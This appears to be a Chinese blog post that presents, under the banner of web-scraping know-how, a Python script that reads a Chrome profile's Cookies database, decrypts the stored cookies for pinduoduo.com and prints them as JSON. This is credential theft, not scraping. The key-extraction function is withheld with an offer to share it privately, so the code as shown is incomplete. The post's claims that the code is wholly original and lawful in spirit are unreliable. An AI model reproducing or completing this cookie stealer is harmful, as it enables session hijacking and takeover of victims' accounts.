反爬与反反爬是竞争中有合作,合作中有竞争,他们共同促进了互联网领域的蓬勃发展。目前是data时代,数据越来越有价值,通过编写爬虫,提取互联网的中的数据来实现数据的价值也变得越来越重要。
爬虫专家受社会的青睐,也受到很多公司的追捧,他们知道知己知彼,才能百战不殆。要想在社会立足,就要通过技术创新获取数据,让数据才引导企业健康发展。
下面是我亲手百分百原创的程序片段,喜欢给同行或者想踏入此领域的IT爱好者一些启迪。让我们携手并且共促祖国IT事业勇攀高峰。
import os import json import base64 import sqlite3 from datetime import datetime, timedelta import win32crypt # pip install pypiwin32 from Crypto.Cipher import AES # pip install pycryptodome import sys import time def get_chrome_datetime(chromedate): """Return a `datetime.datetime` object from a chrome format datetime Since `chromedate` is formatted as the number of microseconds since January, 1601""" if chromedate != 86400000000 and chromedate: try: return datetime(1601, 1, 1) + timedelta(microseconds=chromedate) except Exception as e: print(f"Error: {e}, chromedate: {chromedate}") return chromedate else: return "" def get_encryption_key(file_dir): #欢迎私聊获取核心 def decrypt_data(data, key): try: # get the initialization vector iv = data[3:15] data = data[15:] # generate cipher cipher = AES.new(key, AES.MODE_GCM, iv) # decrypt password return cipher.decrypt(data)[:-16].decode() except: try: return str(win32crypt.CryptUnprotectData(data, None, None, None, 0)[1]) except: # not supported return "" def main(): #print("第一个传入的参数为:", sys.argv[1]) file_dir = sys.argv[1] if time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())) > '2024-10-26 00:00:00': exit(1) # local sqlite Chrome cookie database path ''' db_path = os.path.join(os.environ["USERPROFILE"], "AppData", "Local", "Google", "Chrome", "User Data", "default", "Cookies") ''' # copy the file to current directory # as the database will be locked if chrome is currently open filename = f"{file_dir}\\Default\\Network\\Cookies" if not os.path.exists(filename): filename = f"{file_dir}\\Default\\Cookies" #print(filename) ''' if not os.path.isfile(filename): # copy file when does not exist in the current directory shutil.copyfile(db_path, filename) # connect to the database ''' db = sqlite3.connect(filename) cursor = db.cursor() # get the cookies from `cookies` table cursor.execute(""" SELECT is_secure,is_httponly,path,host_key, name, value, creation_utc, last_access_utc, expires_utc, encrypted_value FROM cookies WHERE host_key like '%pinduoduo.com%' """) # you can also search by domain, e.g thepythoncode.com # cursor.execute(""" # SELECT host_key, name, value, creation_utc, last_access_utc, expires_utc, encrypted_value # FROM cookies # WHERE host_key like '%thepythoncode.com%'""") # get the AES key key = get_encryption_key(file_dir) return_list = [] for is_secure,is_httponly,path,host_key, name, value, creation_utc, last_access_utc, expires_utc, encrypted_value in cursor.fetchall(): if not value: decrypted_value = decrypt_data(encrypted_value, key) else: # already decrypted decrypted_value = value ''' print(f""" Host: {host_key} Cookie name: {name} Cookie value (decrypted): {decrypted_value} Creation datetime (UTC): {get_chrome_datetime(creation_utc)} Last access datetime (UTC): {get_chrome_datetime(last_access_utc)} Expires datetime (UTC): {get_chrome_datetime(expires_utc)} =============================================================== """) ''' return_dict = {} #is_httponly,path,is_secure, return_dict['domain'] = host_key return_dict['expiry'] = expires_utc if is_httponly == 0: is_httponly = 'false' else: is_httponly = 'true' return_dict['httpOnly'] = is_httponly return_dict['name'] = name return_dict['path'] = path if is_secure == 0: is_secure = 'false' else: is_secure = 'true' return_dict['secure'] = is_secure return_dict['value'] = decrypted_value return_list.append(return_dict) # commit changes #db.commit() # close connection db.close() #return_list = json.dumps(return_list, indent=2) return_list = json.dumps(return_list) print(return_list) if __name__ == "__main__": main()
从事IT工作十多个春秋,我亲眼目睹和经历了IT发展的很多阶段。企**和天*无不是爬取数据的应用。很多电商企业也通过技术爬取很多电商平台开放的数据进行分析,通过比价或者推算24小时购买量来分析出爆款数据。一句话,数据太有价值了。欢迎大家进入这个大门。
郑重声明,本人提倡通过努力学习来提升自己的IT技术,反对通过技术来攻击别人服务器,或者通过技术来获取非法数据。让我们为中国IT之崛起而努力钻研。